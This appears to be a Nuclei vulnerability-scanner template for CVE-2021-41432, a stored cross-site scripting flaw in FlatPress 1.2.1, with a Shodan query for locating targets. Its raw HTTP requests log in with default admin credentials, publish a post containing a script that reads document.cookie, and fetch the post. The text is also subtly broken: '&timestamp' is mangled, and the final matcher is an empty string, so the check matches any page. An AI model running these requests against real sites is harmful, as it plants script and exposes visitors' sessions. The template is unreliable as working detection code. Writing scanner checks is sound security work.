id: CVE-2021-41432 info: name: FlatPress 1.2.1 - Cross-site scripting (XSS) author: arafatansari severity: medium description: | A stored cross-site scripting (XSS) vulnerability exists in FlatPress 1.2.1 that allows for arbitrary execution of JavaScript commands through blog content. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41432 metadata: shodan-query: http.html:"Flatpress" verified: "true" tags: xss,cve,2021 requests: - raw: - | POST /login.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykGJmx9vKsePrMkVp ------WebKitFormBoundarykGJmx9vKsePrMkVp Content-Disposition: form-data; name="user" admin ------WebKitFormBoundarykGJmx9vKsePrMkVp Content-Disposition: form-data; name="pass" password ------WebKitFormBoundarykGJmx9vKsePrMkVp Content-Disposition: form-data; name="submit" Login ------WebKitFormBoundarykGJmx9vKsePrMkVp-- - | POST /admin.php?p=entry&action=write HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _wpnonce=4150bd5fe5&_wp_http_referer=%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=abcd×tamp=&entry=&attachselect=--&imageselect=--&content=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&save=Publish - | GET /index.php/2022/10/10/abcd/ HTTP/1.1 Host: {{Hostname}} cookie-reuse: true redirects: true max-redirects: 2 matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "" condition: and